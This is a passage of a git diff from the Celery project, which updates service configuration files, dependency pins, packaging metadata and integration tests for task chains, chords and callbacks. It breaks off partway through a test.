; remove the -A myapp argument if you aren't using an app instance
diff --git a/extra/supervisord/celeryd.conf b/extra/supervisord/celeryd.conf
index 2668ccb4c17..90254f7d4cd 100644
--- a/extra/supervisord/celeryd.conf
+++ b/extra/supervisord/celeryd.conf
@@ -15,7 +15,7 @@ autorestart=true
startsecs=10
; Set full path to celery program if using virtualenv
-command=celery worker -A proj --loglevel=INFO
+command=celery -A proj worker --loglevel=INFO
; Alternatively,
;command=celery --app=your_app.celery:app worker --loglevel=INFO -n worker.%%h
diff --git a/extra/systemd/celery.service b/extra/systemd/celery.service
index b1d6d03b723..ff6bacb89ed 100644
--- a/extra/systemd/celery.service
+++ b/extra/systemd/celery.service
@@ -8,13 +8,13 @@ User=celery
Group=celery
EnvironmentFile=-/etc/conf.d/celery
WorkingDirectory=/opt/celery
-ExecStart=/bin/sh -c '${CELERY_BIN} multi start $CELERYD_NODES \
- -A $CELERY_APP --pidfile=${CELERYD_PID_FILE} --logfile=${CELERYD_LOG_FILE} \
+ExecStart=/bin/sh -c '${CELERY_BIN} -A $CELERY_APP multi start $CELERYD_NODES \
+ --pidfile=${CELERYD_PID_FILE} --logfile=${CELERYD_LOG_FILE} \
--loglevel="${CELERYD_LOG_LEVEL}" $CELERYD_OPTS'
ExecStop=/bin/sh -c '${CELERY_BIN} multi stopwait $CELERYD_NODES \
- --pidfile=${CELERYD_PID_FILE}'
-ExecReload=/bin/sh -c '${CELERY_BIN} multi restart $CELERYD_NODES \
- -A $CELERY_APP --pidfile=${CELERYD_PID_FILE} --logfile=${CELERYD_LOG_FILE} \
+ --pidfile=${CELERYD_PID_FILE} --logfile=${CELERYD_LOG_FILE}'
+ExecReload=/bin/sh -c '${CELERY_BIN} -A $CELERY_APP multi restart $CELERYD_NODES \
+ --pidfile=${CELERYD_PID_FILE} --logfile=${CELERYD_LOG_FILE} \
--loglevel="${CELERYD_LOG_LEVEL}" $CELERYD_OPTS'
Restart=always
diff --git a/extra/systemd/celerybeat.service b/extra/systemd/celerybeat.service
index c8879612d19..c1b2034dcdd 100644
--- a/extra/systemd/celerybeat.service
+++ b/extra/systemd/celerybeat.service
@@ -6,11 +6,12 @@ After=network.target
Type=simple
User=celery
Group=celery
-EnvironmentFile=-/etc/conf.d/celery
+EnvironmentFile=/etc/conf.d/celery
WorkingDirectory=/opt/celery
-ExecStart=/bin/sh -c '${CELERY_BIN} beat \
- -A ${CELERY_APP} --pidfile=${CELERYBEAT_PID_FILE} \
+ExecStart=/bin/sh -c '${CELERY_BIN} -A ${CELERY_APP} beat \
+ --pidfile=${CELERYBEAT_PID_FILE} \
--logfile=${CELERYBEAT_LOG_FILE} --loglevel=${CELERYD_LOG_LEVEL}'
+Restart=always
[Install]
WantedBy=multi-user.target
diff --git a/extra/travis/is-memcached-running b/extra/travis/is-memcached-running
deleted file mode 100755
index 004608663c2..00000000000
--- a/extra/travis/is-memcached-running
+++ /dev/null
@@ -1,11 +0,0 @@
-#!/usr/bin/expect -f
-# based on https://stackoverflow.com/a/17265696/833093
-
-set destination [lindex $argv 0]
-set port [lindex $argv 1]
-
-spawn nc $destination $port
-send stats\r
-expect "END"
-send quit\r
-expect eof
diff --git a/pyproject.toml b/pyproject.toml
index 8b137891791..8ff14c4766b 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -1 +1,6 @@
-
+[tool.pytest.ini_options]
+addopts = "--strict-markers"
+testpaths = "t/unit/"
+python_classes = "test_*"
+xdfail_strict=true
+markers = ["sleepdeprived_patched_module", "masked_modules", "patched_environ", "patched_module"]
diff --git a/requirements/default.txt b/requirements/default.txt
index 124c56679da..3be20593c97 100644
--- a/requirements/default.txt
+++ b/requirements/default.txt
@@ -1,7 +1,9 @@
-pytz>dev
-billiard>=3.6.3.0,<4.0
-kombu>=5.0.0,<6.0
+pytz>0.dev.0
+billiard>=3.6.4.0,<4.0
+kombu>=5.2.2,<6.0
vine>=5.0.0,<6.0
-click>=7.0
+click>=8.0,<9.0
click-didyoumean>=0.0.3
-click-repl>=0.1.6
+click-repl>=0.2.0
+click-plugins>=1.1.1
+setuptools
diff --git a/requirements/dev.txt b/requirements/dev.txt
index 9712c15a2e3..8d28a2924cf 100644
--- a/requirements/dev.txt
+++ b/requirements/dev.txt
@@ -1,5 +1,5 @@
pytz>dev
-git+https://github.com/celery/kombu.git
git+https://github.com/celery/py-amqp.git
+git+https://github.com/celery/kombu.git
git+https://github.com/celery/billiard.git
-vine==1.3.0
\ No newline at end of file
+vine>=5.0.0
\ No newline at end of file
diff --git a/requirements/docs.txt b/requirements/docs.txt
index 69d31dffcce..46b82bd3c26 100644
--- a/requirements/docs.txt
+++ b/requirements/docs.txt
@@ -6,3 +6,4 @@ sphinx-click==2.5.0
-r test.txt
-r deps/mock.txt
-r extras/auth.txt
+-r extras/sphinxautobuild.txt
diff --git a/requirements/extras/azureblockblob.txt b/requirements/extras/azureblockblob.txt
index 37c66507d89..a9208b97325 100644
--- a/requirements/extras/azureblockblob.txt
+++ b/requirements/extras/azureblockblob.txt
@@ -1,3 +1 @@
-azure-storage==0.36.0
-azure-common==1.1.5
-azure-storage-common==1.1.0
+azure-storage-blob==12.9.0
diff --git a/requirements/extras/consul.txt b/requirements/extras/consul.txt
index ad4ba8a08e1..7b85dde7b66 100644
--- a/requirements/extras/consul.txt
+++ b/requirements/extras/consul.txt
@@ -1 +1 @@
-python-consul
+python-consul2
diff --git a/requirements/extras/couchbase.txt b/requirements/extras/couchbase.txt
index ec2b4864740..a736d6a7742 100644
--- a/requirements/extras/couchbase.txt
+++ b/requirements/extras/couchbase.txt
@@ -1 +1 @@
-couchbase>=3.0.0
+couchbase>=3.0.0; platform_python_implementation!='PyPy' and (platform_system != 'Windows' or python_version < '3.10')
\ No newline at end of file
diff --git a/requirements/extras/eventlet.txt b/requirements/extras/eventlet.txt
index e375a087b83..047d9cbcbae 100644
--- a/requirements/extras/eventlet.txt
+++ b/requirements/extras/eventlet.txt
@@ -1 +1 @@
-eventlet>=0.26.1
+eventlet>=0.32.0; python_version<"3.10"
diff --git a/requirements/extras/gevent.txt b/requirements/extras/gevent.txt
index 2fc04b699b3..4d5a00d0fb4 100644
--- a/requirements/extras/gevent.txt
+++ b/requirements/extras/gevent.txt
@@ -1 +1 @@
-gevent>=1.0.0
+gevent>=1.5.0
diff --git a/requirements/extras/lzma.txt b/requirements/extras/lzma.txt
deleted file mode 100644
index 9c70afdf861..00000000000
--- a/requirements/extras/lzma.txt
+++ /dev/null
@@ -1 +0,0 @@
-backports.lzma;python_version<"3.3"
diff --git a/requirements/extras/mongodb.txt b/requirements/extras/mongodb.txt
index b3e1256564f..7ad511e68c5 100644
--- a/requirements/extras/mongodb.txt
+++ b/requirements/extras/mongodb.txt
@@ -1 +1 @@
-pymongo[srv]>=3.3.0
+pymongo[srv]>=3.3.0,<3.12.1
diff --git a/requirements/extras/redis.txt b/requirements/extras/redis.txt
index b0d3f0fb748..6a0c1d208bf 100644
--- a/requirements/extras/redis.txt
+++ b/requirements/extras/redis.txt
@@ -1 +1 @@
-redis>=3.2.0
+redis>=3.4.1,<4.0.0
diff --git a/requirements/extras/solar.txt b/requirements/extras/solar.txt
index 2f340276fa5..6be7adf94ff 100644
--- a/requirements/extras/solar.txt
+++ b/requirements/extras/solar.txt
@@ -1 +1 @@
-ephem
+ephem; platform_python_implementation!="PyPy"
diff --git a/requirements/extras/sphinxautobuild.txt b/requirements/extras/sphinxautobuild.txt
new file mode 100644
index 00000000000..01ce5dfaf45
--- /dev/null
+++ b/requirements/extras/sphinxautobuild.txt
@@ -0,0 +1 @@
+sphinx-autobuild>=2021.3.14
\ No newline at end of file
diff --git a/requirements/extras/sqs.txt b/requirements/extras/sqs.txt
index d4a662987a7..8a7fc342f07 100644
--- a/requirements/extras/sqs.txt
+++ b/requirements/extras/sqs.txt
@@ -1,2 +1 @@
-boto3>=1.9.125
-pycurl==7.43.0.5 # Latest version with wheel built (for appveyor)
+kombu[sqs]
diff --git a/requirements/pkgutils.txt b/requirements/pkgutils.txt
index e5653449606..ea4078d78b4 100644
--- a/requirements/pkgutils.txt
+++ b/requirements/pkgutils.txt
@@ -4,7 +4,6 @@ flake8>=3.8.3
flakeplus>=1.1
flake8-docstrings~=1.5
pydocstyle~=5.0; python_version >= '3.0'
-pydocstyle~=3.0; python_version < '3.0'
tox>=3.8.4
sphinx2rst>=1.0
# Disable cyanide until it's fully updated.
diff --git a/requirements/test-ci-base.txt b/requirements/test-ci-base.txt
index 1fca3a107cb..3563008e5ca 100644
--- a/requirements/test-ci-base.txt
+++ b/requirements/test-ci-base.txt
@@ -1,5 +1,4 @@
pytest-cov
-pytest-travis-fold
codecov
-r extras/redis.txt
-r extras/sqlalchemy.txt
diff --git a/requirements/test-integration.txt b/requirements/test-integration.txt
index 1fcda0bd85c..ab2958d21ff 100644
--- a/requirements/test-integration.txt
+++ b/requirements/test-integration.txt
@@ -1,4 +1,3 @@
-simplejson
-r extras/redis.txt
-r extras/azureblockblob.txt
-r extras/auth.txt
diff --git a/requirements/test.txt b/requirements/test.txt
index fd0ba172f90..90c84b1996e 100644
--- a/requirements/test.txt
+++ b/requirements/test.txt
@@ -1,11 +1,9 @@
-case>=1.3.1
-pytest~=4.6; python_version < '3.0'
-pytest~=6.0; python_version >= '3.0'
+pytest~=6.2
pytest-celery
+pytest-subtests
pytest-timeout~=1.4.2
boto3>=1.9.178
-python-dateutil<2.8.1,>=2.1; python_version < '3.0'
-moto==1.3.7
+moto>=2.2.6
pre-commit
-r extras/yaml.txt
-r extras/msgpack.txt
diff --git a/setup.cfg b/setup.cfg
index fc8847c6200..91641248bc2 100644
--- a/setup.cfg
+++ b/setup.cfg
@@ -1,9 +1,3 @@
-[tool:pytest]
-addopts = --strict-markers
-testpaths = t/unit/
-python_classes = test_*
-xfail_strict=true
-
[build_sphinx]
source-dir = docs/
build-dir = docs/_build
@@ -14,6 +8,7 @@ all_files = 1
# whenever it makes the code more readable.
max-line-length = 117
extend-ignore =
+ E203, # incompatible with black https://github.com/psf/black/issues/315#issuecomment-395457972
D102, # Missing docstring in public method
D104, # Missing docstring in public package
D105, # Missing docstring in magic method
@@ -22,7 +17,6 @@ extend-ignore =
D412, # No blank lines allowed between a section header and its content
E741, # ambiguous variable name '...'
E742, # ambiguous class definition '...'
- F821, # undefined name '...'
per-file-ignores =
t/*,setup.py,examples/*,docs/*,extra/*:
# docstrings
@@ -31,7 +25,7 @@ per-file-ignores =
[bdist_rpm]
requires = pytz >= 2016.7
billiard >= 3.6.3.0,<4.0
- kombu >= 4.6.8,<5.0.0
+ kombu >= 5.2.1,<6.0.0
[bdist_wheel]
universal = 0
diff --git a/setup.py b/setup.py
old mode 100644
new mode 100755
index c5843c28321..6b41a8a71a6
--- a/setup.py
+++ b/setup.py
@@ -1,4 +1,4 @@
-#!/usr/bin/env python
+#!/usr/bin/env python3
import codecs
import os
import re
@@ -27,12 +27,12 @@
'eventlet',
'gevent',
'librabbitmq',
- 'lzma',
'memcache',
'mongodb',
'msgpack',
'pymemcache',
'pyro',
+ 'pytest',
'redis',
's3',
'slmq',
@@ -139,7 +139,7 @@ class pytest(setuptools.command.test.test):
user_options = [('pytest-args=', 'a', 'Arguments to pass to pytest')]
def initialize_options(self):
- setuptools.command.test.test.initialize_options(self)
+ super().initialize_options()
self.pytest_args = []
def run_tests(self):
@@ -163,7 +163,7 @@ def run_tests(self):
license='BSD',
platforms=['any'],
install_requires=install_requires(),
- python_requires=">=3.6,",
+ python_requires=">=3.7,",
tests_require=reqs('test.txt'),
extras_require=extras_require(),
cmdclass={'test': pytest},
@@ -185,12 +185,14 @@ def run_tests(self):
"License :: OSI Approved :: BSD License",
"Topic :: System :: Distributed Computing",
"Topic :: Software Development :: Object Brokering",
+ "Framework :: Celery",
"Programming Language :: Python",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3",
- "Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
+ "Programming Language :: Python :: 3.9",
+ "Programming Language :: Python :: 3.10",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy",
"Operating System :: OS Independent"
diff --git a/t/benchmarks/bench_worker.py b/t/benchmarks/bench_worker.py
index a2102b8bf19..5c9f6f46ba3 100644
--- a/t/benchmarks/bench_worker.py
+++ b/t/benchmarks/bench_worker.py
@@ -1,7 +1,8 @@
import os
import sys
+import time
-from celery import Celery # noqa
+from celery import Celery
os.environ.update(
NOSETPS='yes',
@@ -48,13 +49,13 @@ def it(_, n):
# by previous runs, or the broker.
i = it.cur
if i and not i % 5000:
- print('({} so far: {}s)'.format(i, tdiff(it.subt)), file=sys.stderr)
+ print(f'({i} so far: {tdiff(it.subt)}s)', file=sys.stderr)
it.subt = time.monotonic()
if not i:
it.subt = it.time_start = time.monotonic()
elif i > n - 2:
total = tdiff(it.time_start)
- print('({} so far: {}s)'.format(i, tdiff(it.subt)), file=sys.stderr)
+ print(f'({i} so far: {tdiff(it.subt)}s)', file=sys.stderr)
print('-- process {} tasks: {}s total, {} tasks/s'.format(
n, total, n / (total + .0),
))
@@ -68,7 +69,7 @@ def bench_apply(n=DEFAULT_ITS):
task = it._get_current_object()
with app.producer_or_acquire() as producer:
[task.apply_async((i, n), producer=producer) for i in range(n)]
- print('-- apply {} tasks: {}s'.format(n, time.monotonic() - time_start))
+ print(f'-- apply {n} tasks: {time.monotonic() - time_start}s')
def bench_work(n=DEFAULT_ITS, loglevel='CRITICAL'):
diff --git a/t/distro/test_CI_reqs.py b/t/distro/test_CI_reqs.py
deleted file mode 100644
index a45f3622390..00000000000
--- a/t/distro/test_CI_reqs.py
+++ /dev/null
@@ -1,35 +0,0 @@
-import os
-import pprint
-
-import pytest
-
-
-def _get_extras_reqs_from(name):
- try:
- with open(os.path.join('requirements', name)) as fh:
- lines = fh.readlines()
- except OSError:
- pytest.skip('requirements dir missing, not running from dist?')
- else:
- return {
- line.split()[1] for line in lines
- if line.startswith('-r extras/')
- }
-
-
-def _get_all_extras():
- return {
- os.path.join('extras', f)
- for f in os.listdir('requirements/extras/')
- }
-
-
-def test_all_reqs_enabled_in_tests():
- ci_default = _get_extras_reqs_from('test-ci-default.txt')
- ci_base = _get_extras_reqs_from('test-ci-base.txt')
-
- defined = ci_default | ci_base
- all_extras = _get_all_extras()
- diff = all_extras - defined
- print('Missing CI reqs:\n{}'.format(pprint.pformat(diff)))
- assert not diff
diff --git a/t/integration/tasks.py b/t/integration/tasks.py
index 629afaf2ece..c8edb01d977 100644
--- a/t/integration/tasks.py
+++ b/t/integration/tasks.py
@@ -1,6 +1,6 @@
from time import sleep
-from celery import Task, chain, chord, group, shared_task
+from celery import Signature, Task, chain, chord, group, shared_task
from celery.exceptions import SoftTimeLimitExceeded
from celery.utils.log import get_task_logger
@@ -16,15 +16,26 @@ def identity(x):
@shared_task
-def add(x, y):
- """Add two numbers."""
- return x + y
+def add(x, y, z=None):
+ """Add two or three numbers."""
+ if z:
+ return x + y + z
+ else:
+ return x + y
@shared_task
-def raise_error():
- """Deliberately raise an error."""
- raise ValueError("deliberate error")
+def write_to_file_and_return_int(file_name, i):
+ with open(file_name, mode='a', buffering=1) as file_handle:
+ file_handle.write(str(i)+'\n')
+
+ return i
+
+
+@shared_task(typing=False)
+def add_not_typed(x, y):
+ """Add two numbers, but don't check arguments"""
+ return x + y
@shared_task(ignore_result=True)
@@ -33,6 +44,12 @@ def add_ignore_result(x, y):
return x + y
+@shared_task
+def raise_error(*args):
+ """Deliberately raise an error."""
+ raise ValueError("deliberate error")
+
+
@shared_task
def chain_add(x, y):
(
@@ -76,6 +93,35 @@ def add_replaced(self, x, y):
raise self.replace(add.s(x, y))
+@shared_task(bind=True)
+def replace_with_chain(self, *args, link_msg=None):
+ c = chain(identity.s(*args), identity.s())
+ link_sig = redis_echo.s()
+ if link_msg is not None:
+ link_sig.args = (link_msg,)
+ link_sig.set(immutable=True)
+ c.link(link_sig)
+
+ return self.replace(c)
+
+
+@shared_task(bind=True)
+def replace_with_chain_which_raises(self, *args, link_msg=None):
+ c = chain(identity.s(*args), raise_error.s())
+ link_sig = redis_echo.s()
+ if link_msg is not None:
+ link_sig.args = (link_msg,)
+ link_sig.set(immutable=True)
+ c.link_error(link_sig)
+
+ return self.replace(c)
+
+
+@shared_task(bind=True)
+def replace_with_empty_chain(self, *_):
+ return self.replace(chain())
+
+
@shared_task(bind=True)
def add_to_all(self, nums, val):
"""Add the given value to all supplied numbers."""
@@ -133,6 +179,24 @@ def collect_ids(self, res, i):
return res, (self.request.root_id, self.request.parent_id, i)
+@shared_task(bind=True, default_retry_delay=1)
+def retry(self, return_value=None):
+ """Task simulating multiple retries.
+
+ When return_value is provided, the task after retries returns
+ the result. Otherwise it fails.
+ """
+ if return_value:
+ attempt = getattr(self, 'attempt', 0)
+ print('attempt', attempt)
+ if attempt >= 3:
+ delattr(self, 'attempt')
+ return return_value
+ self.attempt = attempt + 1
+
+ raise self.retry(exc=ExpectedException(), countdown=5)
+
+
@shared_task(bind=True, expires=60.0, max_retries=1)
def retry_once(self, *args, expires=60.0, max_retries=1, countdown=0.1):
"""Task that fails and is retried. Returns the number of retries."""
@@ -143,7 +207,8 @@ def retry_once(self, *args, expires=60.0, max_retries=1, countdown=0.1):
@shared_task(bind=True, expires=60.0, max_retries=1)
-def retry_once_priority(self, *args, expires=60.0, max_retries=1, countdown=0.1):
+def retry_once_priority(self, *args, expires=60.0, max_retries=1,
+ countdown=0.1):
"""Task that fails and is retried. Returns the priority."""
if self.request.retries:
return self.request.delivery_info['priority']
@@ -152,15 +217,21 @@ def retry_once_priority(self, *args, expires=60.0, max_retries=1, countdown=0.1)
@shared_task
-def redis_echo(message):
+def redis_echo(message, redis_key="redis-echo"):
"""Task that appends the message to a redis list."""
redis_connection = get_redis_connection()
- redis_connection.rpush('redis-echo', message)
+ redis_connection.rpush(redis_key, message)
+
+
+@shared_task
+def redis_count(redis_key="redis-count"):
+ """Task that increments a specified or well-known redis key."""
+ redis_connection = get_redis_connection()
+ redis_connection.incr(redis_key)
@shared_task(bind=True)
def second_order_replace1(self, state=False):
-
redis_connection = get_redis_connection()
if not state:
redis_connection.rpush('redis-echo', 'In A')
@@ -224,9 +295,10 @@ def fail(*args):
raise ExpectedException(*args)
-@shared_task
-def chord_error(*args):
- return args
+@shared_task(bind=True)
+def fail_replaced(self, *args):
+ """Replace this task with one which raises ExpectedException."""
+ raise self.replace(fail.si(*args))
@shared_task(bind=True)
@@ -234,6 +306,11 @@ def return_priority(self, *_args):
return "Priority: %s" % self.request.delivery_info['priority']
+@shared_task(bind=True)
+def return_properties(self):
+ return self.request.properties
+
+
class ClassBasedAutoRetryTask(Task):
name = 'auto_retry_class_task'
autoretry_for = (ValueError,)
@@ -244,3 +321,79 @@ def run(self):
if self.request.retries:
return self.request.retries
raise ValueError()
+
+
+# The signatures returned by these tasks wouldn't actually run because the
+# arguments wouldn't be fulfilled - we never actually delay them so it's fine
+@shared_task
+def return_nested_signature_chain_chain():
+ return chain(chain([add.s()]))
+
+
+@shared_task
+def return_nested_signature_chain_group():
+ return chain(group([add.s()]))
+
+
+@shared_task
+def return_nested_signature_chain_chord():
+ return chain(chord([add.s()], add.s()))
+
+
+@shared_task
+def return_nested_signature_group_chain():
+ return group(chain([add.s()]))
+
+
+@shared_task
+def return_nested_signature_group_group():
+ return group(group([add.s()]))
+
+
+@shared_task
+def return_nested_signature_group_chord():
+ return group(chord([add.s()], add.s()))
+
+
+@shared_task
+def return_nested_signature_chord_chain():
+ return chord(chain([add.s()]), add.s())
+
+
+@shared_task
+def return_nested_signature_chord_group():
+ return chord(group([add.s()]), add.s())
+
+
+@shared_task
+def return_nested_signature_chord_chord():
+ return chord(chord([add.s()], add.s()), add.s())
+
+
+@shared_task
+def rebuild_signature(sig_dict):
+ sig_obj = Signature.from_dict(sig_dict)
+
+ def _recurse(sig):
+ if not isinstance(sig, Signature):
+ raise TypeError(f"{sig!r} is not a signature object")
+ # Most canvas types have a `tasks` attribute
+ if isinstance(sig, (chain, group, chord)):
+ for task in sig.tasks:
+ _recurse(task)
+ # `chord`s also have a `body` attribute
+ if isinstance(sig, chord):
+ _recurse(sig.body)
+ _recurse(sig_obj)
+
+
+@shared_task
+def errback_old_style(request_id):
+ redis_count(request_id)
+ return request_id
+
+
+@shared_task
+def errback_new_style(request, exc, tb):
+ redis_count(request.id)
+ return request.id
diff --git a/t/integration/test_canvas.py b/t/integration/test_canvas.py
index f5d19184a34..11079a70d92 100644
--- a/t/integration/test_canvas.py
+++ b/t/integration/test_canvas.py
@@ -1,22 +1,30 @@
-import os
+import collections
+import re
+import tempfile
+import uuid
from datetime import datetime, timedelta
-from time import sleep
+from time import monotonic, sleep
import pytest
+import pytest_subtests # noqa: F401
from celery import chain, chord, group, signature
from celery.backends.base import BaseKeyValueStoreBackend
-from celery.exceptions import ChordError, TimeoutError
+from celery.exceptions import ImproperlyConfigured, TimeoutError
from celery.result import AsyncResult, GroupResult, ResultSet
-from .conftest import get_active_redis_channels, get_redis_connection
+from . import tasks
+from .conftest import (TEST_BACKEND, get_active_redis_channels,
+ get_redis_connection)
from .tasks import (ExpectedException, add, add_chord_to_chord, add_replaced,
add_to_all, add_to_all_to_chord, build_chain_inside_task,
- chord_error, collect_ids, delayed_sum,
- delayed_sum_with_soft_guard, fail, identity, ids,
- print_unicode, raise_error, redis_echo, retry_once,
- return_exception, return_priority, second_order_replace1,
- tsum)
+ collect_ids, delayed_sum, delayed_sum_with_soft_guard,
+ errback_new_style, errback_old_style, fail, fail_replaced,
+ identity, ids, print_unicode, raise_error, redis_count,
+ redis_echo, replace_with_chain,
+ replace_with_chain_which_raises, replace_with_empty_chain,
+ retry_once, return_exception, return_priority,
+ second_order_replace1, tsum, write_to_file_and_return_int)
RETRYABLE_EXCEPTIONS = (OSError, ConnectionError, TimeoutError)
@@ -36,6 +44,62 @@ def flaky(fn):
return _timeout(_flaky(fn))
+def await_redis_echo(expected_msgs, redis_key="redis-echo", timeout=TIMEOUT):
+ """
+ Helper to wait for a specified or well-known redis key to contain a string.
+ """
+ redis_connection = get_redis_connection()
+
+ if isinstance(expected_msgs, (str, bytes, bytearray)):
+ expected_msgs = (expected_msgs, )
+ expected_msgs = collections.Counter(
+ e if not isinstance(e, str) else e.encode("utf-8")
+ for e in expected_msgs
+ )
+
+ # This can technically wait for `len(expected_msg_or_msgs) * timeout` :/
+ while +expected_msgs:
+ maybe_key_msg = redis_connection.blpop(redis_key, timeout)
+ if maybe_key_msg is None:
+ raise TimeoutError(
+ "Fetching from {!r} timed out - still awaiting {!r}"
+ .format(redis_key, dict(+expected_msgs))
+ )
+ retrieved_key, msg = maybe_key_msg
+ assert retrieved_key.decode("utf-8") == redis_key
+ expected_msgs[msg] -= 1 # silently accepts unexpected messages
+
+ # There should be no more elements - block momentarily
+ assert redis_connection.blpop(redis_key, min(1, timeout)) is None
+
+
+def await_redis_count(expected_count, redis_key="redis-count", timeout=TIMEOUT):
+ """
+ Helper to wait for a specified or well-known redis key to count to a value.
+ """
+ redis_connection = get_redis_connection()
+
+ check_interval = 0.1
+ check_max = int(timeout / check_interval)
+ for i in range(check_max + 1):
+ maybe_count = redis_connection.get(redis_key)
+ # It's either `None` or a base-10 integer
+ if maybe_count is not None:
+ count = int(maybe_count)
+ if count == expected_count:
+ break
+ elif i >= check_max:
+ assert count == expected_count
+ # try again later
+ sleep(check_interval)
+ else:
+ raise TimeoutError(f"{redis_key!r} was never incremented")
+
+ # There should be no more increments - block momentarily
+ sleep(min(1, timeout))
+ assert int(redis_connection.get(redis_key)) == expected_count
+
+
class test_link_error:
@flaky
def test_link_error_eager(self):
@@ -413,6 +477,282 @@ def test_chain_of_a_chord_and_three_tasks_and_a_group(self, manager):
res = c()
assert res.get(timeout=TIMEOUT) == [8, 8]
+ @flaky
+ def test_nested_chain_group_lone(self, manager):
+ """
+ Test that a lone group in a chain completes.
+ """
+ sig = chain(
+ group(identity.s(42), identity.s(42)), # [42, 42]
+ )
+ res = sig.delay()
+ assert res.get(timeout=TIMEOUT) == [42, 42]
+
+ def test_nested_chain_group_mid(self, manager):
+ """
+ Test that a mid-point group in a chain completes.
+ """
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ sig = chain(
+ identity.s(42), # 42
+ group(identity.s(), identity.s()), # [42, 42]
+ identity.s(), # [42, 42]
+ )
+ res = sig.delay()
+ assert res.get(timeout=TIMEOUT) == [42, 42]
+
+ def test_nested_chain_group_last(self, manager):
+ """
+ Test that a final group in a chain with preceding tasks completes.
+ """
+ sig = chain(
+ identity.s(42), # 42
+ group(identity.s(), identity.s()), # [42, 42]
+ )
+ res = sig.delay()
+ assert res.get(timeout=TIMEOUT) == [42, 42]
+
+ def test_chain_replaced_with_a_chain_and_a_callback(self, manager):
+ if not manager.app.conf.result_backend.startswith('redis'):
+ raise pytest.skip('Requires redis result backend.')
+
+ redis_connection = get_redis_connection()
+ redis_connection.delete('redis-echo')
+
+ link_msg = 'Internal chain callback'
+ c = chain(
+ identity.s('Hello '),
+ # The replacement chain will pass its args though
+ replace_with_chain.s(link_msg=link_msg),
+ add.s('world'),
+ )
+ res = c.delay()
+
+ assert res.get(timeout=TIMEOUT) == 'Hello world'
+ await_redis_echo({link_msg, })
+
+ def test_chain_replaced_with_a_chain_and_an_error_callback(self, manager):
+ if not manager.app.conf.result_backend.startswith('redis'):
+ raise pytest.skip('Requires redis result backend.')
+
+ redis_connection = get_redis_connection()
+ redis_connection.delete('redis-echo')
+
+ link_msg = 'Internal chain errback'
+ c = chain(
+ identity.s('Hello '),
+ replace_with_chain_which_raises.s(link_msg=link_msg),
+ add.s(' will never be seen :(')
+ )
+ res = c.delay()
+
+ with pytest.raises(ValueError):
+ res.get(timeout=TIMEOUT)
+ await_redis_echo({link_msg, })
+
+ def test_chain_with_cb_replaced_with_chain_with_cb(self, manager):
+ if not manager.app.conf.result_backend.startswith('redis'):
+ raise pytest.skip('Requires redis result backend.')
+
+ redis_connection = get_redis_connection()
+ redis_connection.delete('redis-echo')
+
+ link_msg = 'Internal chain callback'
+ c = chain(
+ identity.s('Hello '),
+ # The replacement chain will pass its args though
+ replace_with_chain.s(link_msg=link_msg),
+ add.s('world'),
+ )
+ c.link(redis_echo.s())
+ res = c.delay()
+
+ assert res.get(timeout=TIMEOUT) == 'Hello world'
+ await_redis_echo({link_msg, 'Hello world'})
+
+ def test_chain_with_eb_replaced_with_chain_with_eb(
+ self, manager, subtests
+ ):
+ if not manager.app.conf.result_backend.startswith('redis'):
+ raise pytest.skip('Requires redis result backend.')
+
+ redis_connection = get_redis_connection()
+ redis_connection.delete('redis-echo')
+
+ inner_link_msg = 'Internal chain errback'
+ outer_link_msg = 'External chain errback'
+ c = chain(
+ identity.s('Hello '),
+ # The replacement chain will die and break the encapsulating chain
+ replace_with_chain_which_raises.s(link_msg=inner_link_msg),
+ add.s('world'),
+ )
+ c.link_error(redis_echo.si(outer_link_msg))
+ res = c.delay()
+
+ with subtests.test(msg="Chain fails due to a child task dying"):
+ with pytest.raises(ValueError):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(msg="Chain and child task callbacks are called"):
+ await_redis_echo({inner_link_msg, outer_link_msg})
+
+ def test_replace_chain_with_empty_chain(self, manager):
+ r = chain(identity.s(1), replace_with_empty_chain.s()).delay()
+
+ with pytest.raises(ImproperlyConfigured,
+ match="Cannot replace with an empty chain"):
+ r.get(timeout=TIMEOUT)
+
+ def test_chain_children_with_callbacks(self, manager, subtests):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ redis_key = str(uuid.uuid4())
+ callback = redis_count.si(redis_key=redis_key)
+
+ child_task_count = 42
+ child_sig = identity.si(1337)
+ child_sig.link(callback)
+ chain_sig = chain(child_sig for _ in range(child_task_count))
+
+ redis_connection.delete(redis_key)
+ with subtests.test(msg="Chain executes as expected"):
+ res_obj = chain_sig()
+ assert res_obj.get(timeout=TIMEOUT) == 1337
+ with subtests.test(msg="Chain child task callbacks are called"):
+ await_redis_count(child_task_count, redis_key=redis_key)
+ redis_connection.delete(redis_key)
+
+ def test_chain_children_with_errbacks(self, manager, subtests):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ redis_key = str(uuid.uuid4())
+ errback = redis_count.si(redis_key=redis_key)
+
+ child_task_count = 42
+ child_sig = fail.si()
+ child_sig.link_error(errback)
+ chain_sig = chain(child_sig for _ in range(child_task_count))
+
+ redis_connection.delete(redis_key)
+ with subtests.test(msg="Chain fails due to a child task dying"):
+ res_obj = chain_sig()
+ with pytest.raises(ExpectedException):
+ res_obj.get(timeout=TIMEOUT)
+ with subtests.test(msg="Chain child task errbacks are called"):
+ # Only the first child task gets a change to run and fail
+ await_redis_count(1, redis_key=redis_key)
+ redis_connection.delete(redis_key)
+
+ def test_chain_with_callback_child_replaced(self, manager, subtests):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ redis_key = str(uuid.uuid4())
+ callback = redis_count.si(redis_key=redis_key)
+
+ chain_sig = chain(add_replaced.si(42, 1337), identity.s())
+ chain_sig.link(callback)
+
+ redis_connection.delete(redis_key)
+ with subtests.test(msg="Chain executes as expected"):
+ res_obj = chain_sig()
+ assert res_obj.get(timeout=TIMEOUT) == 42 + 1337
+ with subtests.test(msg="Callback is called after chain finishes"):
